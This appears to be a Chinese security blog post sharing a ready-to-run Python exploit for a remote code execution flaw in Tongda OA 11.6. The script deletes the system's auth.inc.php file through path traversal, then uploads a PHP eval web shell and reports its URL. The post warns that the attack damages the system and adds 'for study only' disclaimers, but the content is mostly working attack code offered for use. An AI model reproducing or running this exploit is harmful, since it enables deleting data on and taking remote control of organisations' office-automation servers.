通达OA 最新0day RCE 漏洞 附带EXP

通达OA 最新0day RCE 漏洞

此漏洞会删除文件 可能损坏OA系统
要有授权!别瞎搞和批量了

关注时间,老版本不行

11.6 版本可

具体影响范围自行测试

亲测存在

image-20200819123228685

exp利用脚本

来源于网络

禁止进行非法攻击

仅用于工作和学习,禁止_用于_非法攻击,非法传播

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests

target="http://127.0.0.1:8888/"
payload="<?php eval($_POST['test']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('test.php', payload)}
requests.post(url=url,files=files)
url=target+"/_test.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")